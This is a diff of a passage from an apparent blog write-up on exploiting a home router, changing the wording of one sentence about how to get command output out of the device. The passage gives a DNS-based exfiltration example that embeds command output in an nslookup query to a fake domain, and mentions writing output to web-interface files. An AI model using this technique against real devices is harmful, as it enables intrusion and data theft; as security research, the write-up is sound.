elongl/elongl.github.io/_posts/2021-05-30-pwning-home-router.md

 I thought of two ways to do it:
 1. Set myself as the router's DNS server and force the router to issue DNS requests with the command output included.
 For instance, `nslookup $(echo hello).fake.domain`, and then I'd receive a DNS Query request of `hello.fake.domain`.
-However this is a bit tedious because programmatically extracting the data from the DNS requests could be a bit annoying.
+However this method is less preferred because extracting the data programmatically from the DNS requests could be quite tedious.
 2. Looking for files that are displayed within the web interface and write my output to them.

 I then recalled the ping interface.